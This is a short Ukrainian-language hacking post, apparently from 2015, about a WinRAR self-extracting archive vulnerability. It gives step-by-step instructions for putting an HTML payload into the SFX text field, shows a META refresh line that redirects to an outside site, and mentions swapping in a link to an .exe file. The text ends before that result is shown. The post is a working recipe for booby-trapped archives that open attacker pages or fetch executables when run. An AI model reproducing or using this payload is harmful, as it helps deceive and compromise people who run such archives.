Кілька годин тому з’явилася інформація про знайдену в модулі SFX winrar’a уразливість, що дозволяє виконати віддалений код.
Стаття на ксакепе: xakep.ru/2015/10/01/winrar-sfx-bug/
Уразливість працює завдяки підтримці html тегів в winrar при створенні sfx архівів (думаю з такими ви добре знайомі;) ).
Для роботи досить запуску, навіть нічого не треба встановлювати зараз ви побачите чому.
Давайте створимо архів, який буде відкривати потрібний нам сайт (це може бути і будь-файл):
Створюємо архів у winrar.
Вибираємо Створити sfx архів.
Далі переходимо у вкладку Додатково->Параметри sfx->текст і графіка
В область Текст у вікні вписуємо свій код.
Наприклад:
<html><head><title>happy</title><META http-equiv=“refresh” content=“0;URL=http://happy-hack.ru”></head></html>
Де content=”” 0 – час в секундах до відкриття посилання URL=сама посилання
Тиснемо OK
В результаті отримуємо:
До речі, якщо підставити посилання на exe вийде наступне:
